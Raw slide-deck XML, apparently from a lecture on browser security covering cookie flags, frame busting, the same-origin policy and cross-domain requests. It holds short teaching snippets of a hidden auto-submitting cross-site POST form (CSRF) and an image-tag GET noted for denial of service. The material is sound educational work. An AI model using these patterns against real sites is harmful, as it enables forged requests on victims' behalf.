          <p:cNvPr id="1323030" name="Line 22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600200" y="4403725"/>
            <a:ext cx="2667000" cy="701675"/>
            <a:chOff x="1008" y="2774"/>
            <a:chExt cx="1680" cy="442"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1323031" name="Line 23"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1008" y="2976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2" name="Text Box 24"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1064" y="2774"/>
              <a:ext cx="148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GET restricted.html</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US"/>
                <a:t>Cookie:  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US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602163"/>
            <a:ext cx="2209800" cy="701675"/>
            <a:chOff x="3456" y="2899"/>
            <a:chExt cx="1392" cy="442"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1323033" name="Line 25"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3456" y="3120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4" name="Text Box 26"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3552" y="2899"/>
              <a:ext cx="11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restricted.html</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US"/>
                <a:t>auth=val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486400" y="5562600"/>
            <a:ext cx="2209800" cy="396875"/>
            <a:chOff x="3456" y="3504"/>
            <a:chExt cx="1392" cy="250"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1323035" name="Line 27"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="3456" y="3552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6" name="Text Box 28"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3832" y="3504"/>
              <a:ext cx="668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YES/NO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689100" y="5562600"/>
            <a:ext cx="2465388" cy="701675"/>
            <a:chOff x="1064" y="3504"/>
            <a:chExt cx="1553" cy="442"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1323037" name="Line 29"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="1064" y="3744"/>
              <a:ext cx="15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8" name="Text Box 30"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1098" y="3504"/>
              <a:ext cx="14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YES,  </a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US"/>
              </a:br>
              <a:r>
                <a:rPr lang="en-US"/>
                <a:t>      restricted.html</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1323048" name="Text Box 40"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7661275" y="4876800"/>
            <a:ext cx="1254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Check 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Security Policy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137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dirty="0"/>
              <a:t>Uses:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Personalization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User tracking:   e.g.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Doubleclick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   (3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0"/>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> party cookies)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browser will store:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>At most  20 cookies/site,     3 KB / cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Origin is the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tuple</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;domain, path&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can set cookies valid across a domain suffix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Secure Cookies</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1423364" name="Rectangle 4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5" name="AutoShape 5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423366" name="AutoShape 6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8" name="Freeform 8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69" name="AutoShape 9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423370" name="Line 10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423372" name="Line 12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3" name="Text Box 13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Secure=true</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1423374" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="838200" y="3765550"/>
            <a:ext cx="7772400" cy="25749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Provides confidentiality against network attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>  Browser will only send cookie back over HTTPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="80000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>  … but no integrity</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1">
              <a:solidFill>
                <a:srgbClr val="FF00FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>  Can rewrite secure cookies over HTTP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network attacker can rewrite secure cookies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can log user into attacker’s account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304800" y="9906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httpOnly Cookies</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1345541" name="Rectangle 5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2" name="AutoShape 6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45543" name="AutoShape 7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4" name="Rectangle 8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5" name="Freeform 9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6" name="AutoShape 10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45547" name="Line 11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8" name="Text Box 12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345549" name="Line 13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50" name="Text Box 14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httpOnly</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1345565" name="Text Box 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="838200" y="3898900"/>
            <a:ext cx="8022453" cy="252992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 Cookie sent over HTTP(s),  but not accessible to scripts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cannot be read via  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/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Helps prevent cookie theft via XSS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endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> …  but does not stop most other risks of XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>bugs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and frame busting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ChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="2164140"/>
            <a:ext cx="7010400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&lt;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 name=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>myframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>”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      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>=“http://www.google.com/”&gt;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       This text is ignored by most browsers.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&lt;/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&gt;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Frames</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14673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791260"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Embed HTML documents in other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67397" name="Object 5"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4038600" y="4106139"/>
          <a:ext cx="4343400" cy="2193061"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <p:oleObj spid="_x0000_s3074" name="Image" r:id="rId3" imgW="3873016" imgH="195555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41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31662" r="77435" b="47917"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6248400" y="3081338"/>
            <a:ext cx="24384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8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Busting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14684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/>
              <a:t>Goal:  prevent web page from loading in a frame</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>example: opening login page in a frame will display</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>correct passmark image</a:t>
            </a:r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Frame busting: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68421" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1371600" y="4724826"/>
            <a:ext cx="542725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95600" y="1976438"/>
            <a:ext cx="3276600" cy="391001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895600" y="3981450"/>
            <a:ext cx="533400" cy="1905000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/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638800" y="1976438"/>
            <a:ext cx="533400" cy="2157412"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/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3317" name="Picture 4" descr="http://indarktrees.com/pics/villian%2520copy.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect l="14191" t="2339" r="11314" b="20322"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7162800" y="1905000"/>
            <a:ext cx="17033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Alice _8885 by Disney-Grandpa."/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect l="7903" t="10526" r="9120" b="7895"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="38862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6927850" y="4286250"/>
            <a:ext cx="2139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Network Attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Intercepts and controls network communication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533400" y="626745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3321" name="Right Arrow 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2057400" y="43434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2" name="Right Arrow 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="2057400" y="52578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3" name="Right Arrow 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6324600" y="23622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4" name="Right Arrow 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="6324600" y="3276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3325" name="Picture 11" descr="CompaqAlphaServerES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5583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Box 28"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4954588" y="4743450"/>
            <a:ext cx="1001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System</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13327" name="Straight Connector 33"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="4432300" y="2967038"/>
            <a:ext cx="488950" cy="3032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8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4242594" y="3899694"/>
            <a:ext cx="1028700" cy="10017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Cloud Callout 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4800600" y="2778125"/>
            <a:ext cx="1155700" cy="1276350"/>
          </a:xfrm>
          <a:prstGeom prst="cloudCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -200975"/>
              <a:gd name="adj2" fmla="val 175085"/>
            </a:avLst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13330" name="Picture 18" descr="toshiba_satellite_a105_s4284_lap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252913"/>
            <a:ext cx="14366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/>
              <a:t>Frame Busting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1469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Problem:     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>OnUnload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> event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smtClean="0"/>
              <a:t>Try this instead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1469444" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="958366" y="2817168"/>
            <a:ext cx="711932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dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>&lt;body </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>onUnload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>javascript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 err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>cause_an_abort</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>;)"&gt; </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1469445" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1828800" y="4410943"/>
            <a:ext cx="5427255" cy="13111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+mn-lt"/>
              </a:rPr>
              <a:t>else {  …  code of page here …}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Rendering content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Security User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Cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Frames </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>and frame busting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95"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{46B31AD6-B944-4F9C-84AF-4B8F5BA0C400}" type="slidenum">
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>72</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14643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  END</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="146432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95"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{38C916EB-5A53-46DC-A007-387FB793D3D6}" type="slidenum">
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>73</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRP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Network access from </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4000"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="4000"/>
              <a:t>browser sandbox</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="133837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462338"/>
            <a:ext cx="6781800" cy="20240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en-US"/>
              <a:t> Send anywhere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/>
              <a:t>   (but some ports are inaccessible, e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>SMTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="80000"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> Read response only from your origin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4000"/>
              <a:t>Same Origin Requests with XMLHttpRequet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="136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&lt;script&gt;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var xhr = new XMLHttpRequest();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xhr.open("POST", "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://www.example.com:81/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>foo/example.cgi", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>true</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);  // asynchronous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xhr.send("Hello world!");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xhr.onload = function() {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  if (xhr.status == 200) {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    alert(xhr.responseText);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  }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&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1364996" name="AutoShape 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="2438400"/>
            <a:ext cx="8229600" cy="11430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1364997" name="Text Box 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6873875" y="3538538"/>
            <a:ext cx="19653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6F89F7"/>
                </a:solidFill>
              </a:rPr>
              <a:t>prepare request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1364998" name="AutoShape 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2565400" y="4876800"/>
            <a:ext cx="2844800" cy="533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1364999" name="Text Box 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3810000" y="5334000"/>
            <a:ext cx="17653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6F89F7"/>
                </a:solidFill>
              </a:rPr>
              <a:t>read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/>
              <a:t>Sending a Cross-Domain GET</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="136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/>
              <a:t>Data must be URL encoded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latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;img src="http://othersite.com/file.cgi?foo=1&amp;bar=x y"&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000"/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/>
              <a:t>Browser sends:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Consolas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GET file.cgi?foo=1&amp;bar=x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>%20</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>y HTTP/1.1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Host: othersite.com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latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Can’t send to some restricted ports, like 25 (SMTP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Denial of Service (DoS) using GET:    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>a popular site can DoS another site  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>[Puppetnets ’06]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/>
              <a:t>Sending a Cross-Domain POST</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137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>
              <a:latin typeface="Consolas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nsolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;form method="POST" action="http://othersite.com/file.cgi" encoding="text/plain"&gt;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nsolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;input type="hidden" name=“Hello world!\n\n2¥+2¥" value=“4¥"&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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nsolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/form&gt;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>
              <a:latin typeface="Consolas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nsolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;script&gt;document.forms[0].submit()&lt;/script&gt;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Hidden iframe can do this in background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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>	user visits a malicious page, browser submits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form on behalf of user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		e.g.  page re-programs user’s home router  (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>XSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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Can’t send to some restricted ports, like 25 (SMTP)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1372165" name="AutoShape 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="838200" y="2965450"/>
            <a:ext cx="5181600" cy="6096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1372166" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
